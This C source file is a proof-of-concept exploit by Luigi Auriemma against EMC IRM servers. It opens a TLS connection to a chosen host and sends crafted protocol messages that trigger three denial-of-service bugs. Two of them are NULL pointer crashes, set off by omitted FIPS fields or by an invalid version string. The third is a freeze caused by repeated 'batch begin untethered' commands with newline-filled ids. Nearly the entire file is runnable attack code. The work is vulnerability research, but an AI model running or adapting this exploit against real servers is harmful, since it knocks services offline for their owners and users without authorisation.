/*
by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <time.h>
#include <inttypes.h>
#include <openssl/ssl.h>    // -lssl -lcrypto -lgdi32

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stricmp strcasecmp
    #define stristr strcasestr
    #define strnicmp strncasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"

#define CLOSE_SD    { \
                        if(ssl_sd) { \
                            SSL_shutdown(ssl_sd); \
                            SSL_free(ssl_sd); \
                        } \
                        if(ctx_sd) SSL_CTX_free(ctx_sd); \
                        if(sd > 0) close(sd); \
                    }



int mysend(SSL *ssl_sd, int sd, u8 *data, int datasz);
int myrecv(SSL *ssl_sd, int sd, u8 *data, int datasz);
int irm_send(SSL *ssl_sd, ...);
int irm_recv(SSL *ssl_sd);
int tcp_send(SSL *ssl_sd, int sd, u8 *buff, int len);
int tcp_recv(SSL *ssl_sd, int sd, u8 *buff, int len);
u8 *base64_encode(u8 *data, int *size);
u8 *base64_decode(u8 *data, int *size);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



static u8   *g_ver  = "4.6.1";



int main(int argc, char *argv[]) {
    SSL_CTX     *ctx_sd     = NULL;
    SSL         *ssl_sd     = NULL;
    struct  sockaddr_in peer;
    int     sd      = 0,
            i,
            bug,
            len;
    u16     port    = 443;
    u8      tmp[1024],
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "EMC IRM vulnerabilities " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%d)]\n"
            "\n"
            "Bugs:\n"
            " 1 = \"version compat check\" *FIPS NULL pointer\n"
            " 2 = freezing caused by multiple commands (CTRL-C to exploit it)\n"
            " 3 = NULL pointer caused by commands after invalid version\n"
            "\n"
            "Note: you must manually kill this PoC if you no longer receive data\n"
            "\n", argv[0], port);
        exit(1);
    }

    bug  = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

redo_all:
    CLOSE_SD
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
      < 0) std_err();
    printf("- connected\n");

    SSL_library_init();
    SSL_load_error_strings();
    ctx_sd = SSL_CTX_new(TLSv1_method());
    SSL_CTX_set_cipher_list(ctx_sd, "ALL");
    SSL_CTX_set_options(ctx_sd, SSL_OP_ALL);
    ssl_sd = SSL_new(ctx_sd);
    SSL_set_fd(ssl_sd, sd);
    if(SSL_connect(ssl_sd) < 0) goto quit;

    if(bug == 3) g_ver = "blahblahblah";

redo:
    len = 0x80;
    memset(tmp, 0, len);
    p = base64_encode(tmp, &len);
    if(irm_send(ssl_sd,
        "Command",              "version compat check",
        "ProtocolVersion",      "336",
        "Version",              g_ver,
        "CID",                  "000000000000000000000000000000000000000000000000",
        "EncClientVersion",     p,
        "EncClientType",        p,
        (bug == 1) ? "" : "EncClientVersionFIPS", "jgUaBhxO6Vzm8uZxUAVHzh+8wt5rbepiBOaK5vzhvvKM/aahmDFcUD6TwJQXXV+abhIpro/ZqGkSF0PjB6rEUdtV4aeHd3EiUw5yGs/Jc8JC1EKtaGWYfPKdgae5qDLp9ea/5omLbE0gl9JecyDVfoUsRVErpLmzsHpF3QlWQyE=",
        (bug == 1) ? "" : "EncClientTypeFIPS",    "VRK9eA6Qf8oyHMFdwITQfI3SRmSW09K4SAmfHRMdgvPdlqa+g+HjRKtshL5VtKAzq47AuiFg3EJ5L7semvvkJqYNR3fQZ5reXqVFYuWuTXwojcSbOwQLwNcq6GMa/t6FFy/zOPzeBa2IcFARbwhXIWMDfxlURzK96VKrczRSAIw=",
        "Client",               "pva",
        "NewClient",            "PSA",
        "Capability",           "0",
        "GMTOffset",            "120",
        "Language",             "en",
        "Country",              "us",
        "Charset",              "US-ASCII",
        "ga.email",             "Unknown",
        "ga.volid",             "0000-0000",
        NULL, NULL
    ) < 0) goto quit;
    free(p);

    if(bug == 1) goto redo_all;

    len = irm_recv(ssl_sd);
    if(len < 0) goto quit;

    if(len != 0) {
        if(bug == 3) goto redo;
        goto redo_all; // set g_ver
    }

    if(bug == 1) {
        // do nothing

    } else if((bug == 2) || (bug == 3)) {
        for(i = 0;; i++) {
            memset(tmp, '\n', sizeof(tmp) - 1);
            tmp[sizeof(tmp) - 1] = 0;
            if(irm_send(ssl_sd,
                "Command",      "batch begin untethered",
                "CID",          "000000000000000000000000000000000000000000000000",
                "Reason",       "myreason",
                "Duration",     "9999",
                "id",           tmp,
                NULL, NULL
            ) < 0) goto quit;
            if(bug == 3) goto redo_all;
            len = irm_recv(ssl_sd);
            if(len < 0) goto quit;
        }

    } else {
        printf("\nError: invalid bug number (%d)\n", bug);
        exit(1);
    }

    /*
    for(;;) {
        len = irm_recv(ssl_sd);
        if(len < 0) goto quit;
    }
    */

quit:
    CLOSE_SD
    printf("- done\n");
    return(0);
}



int mysend(SSL *ssl_sd, int sd, u8 *data, int datasz) {
    if(ssl_sd) return(SSL_write(ssl_sd, data, datasz));
    return(send(sd, data, datasz, 0));
}



int myrecv(SSL *ssl_sd, int sd, u8 *data, int datasz) {
    if(ssl_sd) return(SSL_read(ssl_sd, data, datasz));
    return(recv(sd, data, datasz, 0));
}



int irm_send(SSL *ssl_sd, ...) {
    va_list ap;
    int     i;
    u8      *par,
            *val,
            *val_b64;

    printf("\n- start sending:\n");

    va_start(ap, ssl_sd);
    for(i = 0;; i++) {
        par = va_arg(ap, u8 *);
        if(!par) break;
        val = va_arg(ap, u8 *);
        if(!val) break;

        printf("  %-20s %s\n", par, val);

        if(tcp_send(ssl_sd, 0, par, strlen(par)) < 0) return(-1);
        val_b64 = base64_encode(val, NULL);
        if(val_b64) {
            if(tcp_send(ssl_sd, 0, "=", 1) < 0) return(-1);
            if(tcp_send(ssl_sd, 0, val_b64, strlen(val_b64)) < 0) return(-1);
            free(val_b64);
        }
        if(tcp_send(ssl_sd, 0, "\n", 1) < 0) return(-1);
    }
    va_end(ap);

    if(tcp_send(ssl_sd, 0, "\n", 1) < 0) return(-1);
    printf("\n");
    return(0);
}



int irm_recv(SSL *ssl_sd) {
    static int  buffsz  = 0;
    static u8   *buff   = NULL;
    int     i,
            t,
            result  = 0;
    u8      *par,
            *val;

    printf("\n- start receiving:\n");
    do {
        par = NULL;
        val = NULL;
        for(i = 0;; i++) {
            //if(timeout(sd, 3) < 0) return(-1);   // can't be used select with ssl
            if(i >= buffsz) {
                buffsz += 1024;
                buff = realloc(buff, buffsz + 1);
                if(!buff) std_err();
            }
            t = myrecv(ssl_sd, 0, &buff[i], 1);
            if(t <= 0) return(-1);
            if((buff[i] == '=') && !par) {
                buff[i] = 0;
                par = buff;
                val = buff + i + 1;
            } else if(buff[i] == '\n') {
                break;
            }
        }
        buff[i] = 0;
        if(par && val) {
            val = base64_decode(val, NULL);
            if(!stricmp(par, "ServerVersion")) g_ver = strdup(val);
            if(!stricmp(par, "result")) {
                if(!stricmp(val, "success")) result = 0;
                else                         result = 1;
            }
            printf("  %-20s %s\n", par, val);
            if(val) free(val);
        } else {
            break;
        }
    } while(buff[0]);
    printf("\n");
    return(result);
}



int tcp_send(SSL *ssl_sd, int sd, u8 *buff, int len) {
    if(len <= 0) return(0);
    if(mysend(ssl_sd, sd, buff, len) != len) return(-1);
    return(len);
}



int tcp_recv(SSL *ssl_sd, int sd, u8 *buff, int len) {
    int     t;
    u8      *p,
            c;

    if(len <= 0) return(0);
    for(p = buff; len; p += t, len -= t) {
        if(sd > 0) {
            if(timeout(sd, 3) < 0) return(-1);
        }
        if(buff) {
            t = myrecv(ssl_sd, sd, p, len);
        } else {
            t = myrecv(ssl_sd, sd, &c, 1);
        }
        if(t <= 0) return(-1);
    }
    len = p - buff;
    return(len);
}



u8 *base64_encode(u8 *data, int *size) {
    int     len,
            a,
            b,
            c;
    u8      *buff,
            *p;
    static const u8 base[64] = {
        'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
        'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
        'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
        'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
    };

    if(!size || (*size < 0)) {      // use size -1 for auto text size!
        len = strlen(data);
    } else {
        len = *size;
    }
    buff = malloc(((len / 3) << 2) + 6);
    if(!buff) return(NULL);

    p = buff;
    do {
        a = data[0];
        b = data[1];
        c = data[2];
        *p++ = base[(a >> 2) & 63];
        *p++ = base[(((a &  3) << 4) | ((b >> 4) & 15)) & 63];
        *p++ = base[(((b & 15) << 2) | ((c >> 6) &  3)) & 63];
        *p++ = base[c & 63];
        data += 3;
        len  -= 3;
    } while(len > 0);
    for(*p = 0; len < 0; len++) *(p + len) = '=';

    if(size) *size = p - buff;
    return(buff);
}



u8 *base64_decode(u8 *data, int *size) {
    int     len,
            xlen,
            a   = 0,
            b   = 0,
            c,
            step;
    u8      *buff,
            *limit,
            *p;
    static const u8 base[128] = {   // supports also the Gamespy base64
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x3e,0x00,0x3e,0x00,0x3f,
        0x34,0x35,0x36,0x37,0x38,0x39,0x3a,0x3b,0x3c,0x3d,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,
        0x0f,0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,0x18,0x19,0x3e,0x00,0x3f,0x00,0x3f,
        0x00,0x1a,0x1b,0x1c,0x1d,0x1e,0x1f,0x20,0x21,0x22,0x23,0x24,0x25,0x26,0x27,0x28,
        0x29,0x2a,0x2b,0x2c,0x2d,0x2e,0x2f,0x30,0x31,0x32,0x33,0x00,0x00,0x00,0x00,0x00
    };

    if(!size || (*size < 0)) {      // use size -1 for auto size!
        len = strlen(data);
    } else {
        len = *size;
    }
    xlen = ((len >> 2) * 3) + 1;    // NULL included in output for text
    buff = malloc(xlen);
    if(!buff) return(NULL);

    p = buff;
    limit = data + len;

    for(step = 0; /* data < limit */; step++) {
        do {
            if(data >= limit) {
                c = 0;
                break;
            }
            c = *data;
            data++;
            if((c == '=') || (c == '_')) {  // supports also the Gamespy base64
                c = 0;
                break;
            }
            if(c == '%') {
                if(sscanf(data, "%02x", &c) != 1) {
                    c = 0;
                    break;
                }
                data += 2;
            }
        } while(c && ((c <= ' ') || (c > 0x7f)));
        if(!c) break;

        switch(step & 3) {
            case 0: {
                a = base[c];
                break;
            }
            case 1: {
                b = base[c];
                *p++ = (a << 2)        | (b >> 4);
                break;
            }
            case 2: {
                a = base[c];
                *p++ = ((b & 15) << 4) | (a >> 2);
                break;
            }
            case 3: {
                *p++ = ((a & 3) << 6)  | base[c];
                break;
            }
        }
    }
    *p = 0;

    len = p - buff;
    if(size) *size = len;
    if((len + 1) != xlen) {             // save memory
        buff = realloc(buff, len + 1);  // NULL included!
        if(!buff) return(NULL);
    }
    return(buff);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        }
        host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


